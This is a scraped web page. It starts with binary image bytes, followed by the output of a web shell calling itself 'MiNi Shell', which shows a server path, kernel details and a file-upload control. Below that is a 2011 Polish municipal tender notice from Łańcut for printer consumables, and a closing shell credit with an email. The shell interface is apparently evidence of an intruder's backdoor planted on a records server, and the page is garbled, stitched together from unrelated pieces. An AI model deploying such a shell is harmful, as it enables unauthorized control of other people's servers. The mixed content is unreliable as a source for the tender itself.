JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110126/29077-N-2011.html

<p class="kh_header"><b>Łańcut: Dostawę materiałów eksploatacyjnych do drukarek, papieru, segregatorów, dyskietek, płyt cd, sprężonego powietrza.</b><br>
<b>Numer ogłoszenia: 29077 - 2011; data zamieszczenia: 26.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łańcut , Plac Sobieskiego 18, 37-100 Łańcut, woj. podkarpackie, tel. 017 2252202, faks 017 2252021.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lancut.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę materiałów eksploatacyjnych do drukarek, papieru, segregatorów, dyskietek, płyt cd, sprężonego powietrza..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawę materiałów eksploatacyjnych do drukarek, papieru, segregatorów, dyskietek, płyt cd, sprężonego powietrza.
Zakres zamówienia obejmuje  dostawę fabrycznie nowych materiałów eksploatacyjnych do drukarek 
komputerowych oraz pozostałych materiałów (materiały eksploatacyjne do drukarek, tusze, tonery, kasety 
z tonerem, taśmy do drukarek, papier ksero, papier do drukarek, płyty CD, sprężone powietrze).
Szczegółowy zakres zamówienia opisany został w Formularzu Cenowym - zał nr 6.
Zamawiający wymaga, aby wszystkie produkty objęte przedmiotowym zamówieniem były fabrycznie nowe, 
nieużywane, wolne od wad, dopuszczone do obrotu na terytorium Polski, ich wyprodukowanie nie narusza 
prawa patentowych kompletne i najwyższej jakości, oryginalnie zapakowane, nie noszące śladów 
otwierania, nie regenerowane, nie poddane procesowi ponownego napełniania, recyklingu, demontażu lub 
wymiany jakichkolwiek elementów, posidające oryginalną gwarancję producenta, a ich zastosowanie nie 
może spowodować utraty gwarancji producenta sprzętu. 
Zamawiający wymaga oferowania produktów oryginalnych, tzn. wyprodukowanych przez producenta tego urządzenia, do którego dany materiał jest przeznaczony lub materiałów eksploatacyjnych równoważnych pod warunkiem, że mają one nie gorsze parametry od oryginalnych.
Wymienione w Formularzu Cenowym nazwy firm, typy lub nazwy własne należy traktować jako 
wyznacznik właściwości użytkowych oraz minimalnych parametrów jakościowych zamawianych artykułów,
których dotrzymania żąda Zamawiający dla wszystkich artykułów stanowiących przedmiot zamówienia 
opisanych nazwą producenta, marką, typem. 
Produkty opisane poprzez wskazanie producenta, stanowią towar powszechnie dostępny na rynku. Ich 
wskazanie ma na celu określenie oczekiwanego standardu jakościowego i wydajnościowego. W pozycjach 
opisanych poprzez wskazania znaku towarowego, patentu lub pochodzenia, a także produktów innych 
producentów niż producent sprzętu, możliwe jest składanie ofert równoważnych o parametrach technicznych 
i wymogach jakościowych nie niższych niż orygainalne produkty do urządzeń posiadanych -  wskazanych 
przez Zamawiającego kompatybilnych ze sprzętem do którego jest zamawiany.

Wykonawca, który złoży ofertę zawierającą rozwiązania równoważne do opisanych przez  Zamawiającego, 
jest obowiązany wykazać, że oferowane przez niego artykuły  spełniają wymagania  określone przez 
Zamawiającego w SIWZ. 
W przypadku materiałów eksploatacyjnych, gdy Wykonawca  oferuje towary innych producentów niż  
wymienionych w Formularzu Cenowym składa także zobowiązanie do pokrycia kosztów  naprawy sprzętu 
( lub zakupu nowego sprzętu w przypadku braku możliwości naprawy ) wynikłych na skutek stosowania 
równoważnych materiałów eksploatacyjnych do drukarek (np. zabrudzenie, zalanie drukarki wkładem, 
tuszem, tonerem, czy taśmą drukującą , udokumentowanych ekspertyzą serwisu , a dla sprzętu będącego na 
gwarancji w przypadku odmowy naprawy przez serwis autoryzowany spowodowanej używaniem 
równoważnych materiałów eksploatacyjnych. 
Reklamacje wad jakościowych lub braków ilościowych Wykonawca zobowiązuje się rozpatrzyć 
niezwłocznie po zgłoszeniu wady lub braku przez Zamawiającego i w przypadku uznania reklamacji za 
zasadną w terminie do siedmiu dni od zgłoszenia wady lub braku, towar wadliwy wymienić na wolny od 
wad lub w tym samym czasie dostarczyć brakującą część towaru.
Zamawiający wymaga, aby Wykonawca udzielił minimum 12 miesięcznej gwarancji na dostarczone
materiały drukujące, licząc od dnia odbioru przedmiotu zamówienia.
W przypadku ujawnienia, w okresie gwarancji, uszkodzeń, wad lub niesprawności dostarczonych materiałów 
eksploatacyjnych do drukarek, Zamawiający wymaga aby Wykonawca bezpłatnie je wymienił na nowe, 
wolne od wad, w terminie nie dłuższym niż 7 dni, od dnia zgłoszenia przez Zamawiającego drogą 
telefoniczną, faksem lub pisemnie. W przypadku wymiany materiałów na nowe, wolne od wad, okres 
gwarancji biegnie na nowo, od daty ich dostarczeniadoZamawiającego.
Jeżeli oferowane materiały  eksploatacyjne zastosowane w sprzęcie Zamawiającego spowodują jego 
uszkodzenie, a przyczyną będzie brak zaleconej przez producentów sprzętu zgodności do ich stosowania 
(utrata gwarancji na sprzęt), Wykonawca zobowiązany będzie do poniesienia kosztów naprawy dokonanej
przez Zamawiającego.
Wykonawca zobowiązany będzie do przystąpienia do napraw sprzętu w siedzibie Zamawiającego w czasie 
nie dłuższym niż 48 godzin od przyjęcia zgłoszenia. Ponadto, na czas naprawy sprzętu Wykonawca 
zamówienia zobowiązany będzie dostarczyć sprzęt zastępczy nie gorszej jakości nie później niż w dniu 
przystąpienia do naprawy, o ile w tym dniu nie nastąpi naprawa uszkodzonego sprzętu. 
W przypadku konieczności dokonania naprawy poza siedzibą Zamawiającego Wykonawca zobowiązuje się 
do odbioru sprzętu podlegającego naprawie gwarancyjnej i jego zwrotu, od i do Zamawiającego na własny 
koszt. 
Jeżeli Zamawiający wykaże w trakcie realizacji umowy, iż dostarczony zamiennik nie jest odpowiednikiem 
pod względem parametrów jakościowych i użytkowych artykułu podstawowego (określonego w formularzu 
kosztorysu ofertowego, Wykonawca w ramach wynagrodzenia umownego jest zobowiązany do dostarczenia 
artykułu podstawowego za cenę jednostkową określoną w formularzu cenowym i wymiany już 
dostarczonych egzemplarzy.	
Na Wykonawcy spoczywa obowiązek udowodnienia, że oferowane przez niego produkty odpowiadają w/w 
cechom. W przeprowadzonym dowodzie należy odnieść się do norm, konstrukcji, parametrów oraz 
standardów i dokonać porównania, z którego musi wynikać, iż produkt oferowany jako równoważny jest 
identycznej lub lepszej jakości od produktu wskazanego przez Zamawiającego.

Dowód taki, oparty na badaniach, musi zostać przygotowany w formie zaświadczenia i wystawiony przez niezależny podmiot uprawniony zgodnie z § 5 ust. 
1 pkt 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane 
(Dz. U. z 2009 r., Nr 226, poz. 1817). 
Za podmiot uprawniony do kontroli jakości uznaje się niezależny podmiot krajowy wpisany na listę notyfikowanych jednostek certyfikujących i jednostek kontrolujących oraz notyfikowanych laboratoriów zamieszczoną w Obwieszczeniu Ministra Gospodarki i Pracy z dnia 25 października 2004 r. (M.P. 
z 2004 r., Nr 50, poz. 858), lub mający swoją siedzibę na terenie Unii Europejskiej.
W przypadku zaoferowania równoważnych materiałów eksploatacyjnych wykonawca składa oświadczenie, że zobowiązuje się do pokrycia kosztów serwisowania w przypadku gdy usterka zostałaby wywołana przez stosowanie produktów równoważnych.
Materiały eksploatacyjne   muszą być fabrycznie nowe i posiadać oryginalne  fabrycznie zamknięte  opakowanie.Opakowane ma bezpośrednio chronić kasetę z tonerem oraz tusz po wyjęciu z opakowania zewnętrznego (opakowania wewnętrzne). 
Każda kaseta z tonerem i tuszem powinna być wyposażona w zabezpieczenia umożliwiające rozpoznanie czy materiał eksploatacyjny był otwierany/używany. 
Wszystkie oferowane materiały eksploatacyjne mają być oznakowane indywidualnym kodem producenta umożliwiającym jednoznaczną identyfikację producenta oraz modelu materiału eksploatacyjnego. Oznaczenia mają  być umieszczone na opakowaniach zewnętrznych oraz bezpośrednio na kasecie z tonerem oraz tuszu. Kaseta z tonerem oraz tuszem jak i każda cześć wchodząca w jej skład nie może pochodzić 
z procesu regeneracji i być wtórnie użyta w dostarczonym materiale eksploatacyjnym. 
Użycie równoważnych materiałów eksploatacyjnych nie może powodować utraty gwarancji producenta sprzętu do którego ww. materiały są przeznaczone oraz ograniczać 
funkcji i możliwości sprzętu oraz jakości wydruku opisanych w warunkach technicznych producenta sprzętu (pełna kompatybilność z oprogramowaniem sprzętu: drukarki, faksu lub ksero, informowanie o liczbie
wydrukowanych stron oraz poziomie zużycia tonera/tuszu). 

Pod pojęciem -fabrycznie nowe -Zamawiający rozumie produkty wykonane z nowych elementów, wcześniej nie używanych, nie regenerowanych, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta z oznaczonym logo, w szczelnej folii i nowym opakowaniu kartonowym, symbolem produktu 
i terminem przydatności do użytku. Dostarczone materiały eksploatacyjne do drukarek  (drukujące) będą wysokiej jakości oraz zapewniają kompatybilność pracy z urządzeniami Zamawiającego, zapewniają należyte bezpieczeństwo oraz nie mogą ograniczać współpracy z oprogramowaniem urządzenia monitorującym stan zasobników z tuszem lub tonerem. W przypadku, gdy materiał oryginalny (pochodzący od producenta urządzenia) posiada układ elektroniczny (chip) przekazujący informacje o stanie zużycia tuszu lub tonera, oferowany materiał równoważny musi posiadać analogiczny układ, tak samo działający.
Za równoważne Zamawiający uznaje produkty, których wydajność (np. mierzona zgodnie z normą  ISO/IEC 
19752, ISO/IEC 19798, ISO 24711, ISO 24712 lub równoważną normą jakościową) jest nie mniejsza niż kaset oryginalnych; materiały te  mają odpowiadać wymogom bezpieczeństwa zgodnie 
z  Dyrektywą Unii Europejskiej 91/155/EEC wraz z poprawkami 2001/58/EC (karty charakterystyki). Równiez proces produkcji tych materiałów ma przebiegac zgodnie z normą 14001 lub równoważną (wymogi odnośnie ochrony środowiska). 

Wykonawca zobowiązuje się odbierać pojemniki po zużytych tuszach i tonerach dostarczonych zgodne 
z niniejszą umową, co zostanie potwierdzone protokołem. Wykonawca zobowiązuje się odbierać pojemniki 
na koszt własny i za wezwaniem pisemnym Zamawiającego. Wykonawca zobowiązuje się odebrać 
pojemniki  w terminie 7 dni od dnia złożenia pisemnego wezwania przez Zamawiającego bez dodatkowych 
opłat..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.21.13-6, 30.19.23.00-4, 21.12.56.92-2, 21.23.36.00-1, 21.23.41.00-3, 21.21.11.20-2, 30.21.73.40-8, 24.11.13.20-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1500 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje co najmniej 2 dostawy materiałów eksploatacyjnych do drukarek o wartości 40 000 zł każda. Wykonawca
zobowiązany jest do przedstawienia dokuemntów potwierdzających należyte wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrota.podkarpackie.pl/pl/bip/gminy/um_lancut<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Łańcuta, Plac Soebieskiego 18, 37-100 Łańcut.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2011 godzina 08:30, miejsce: Urząd Miasta Łańcuta, Plac Sobieskiego 18, 37-100 Łańcut.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com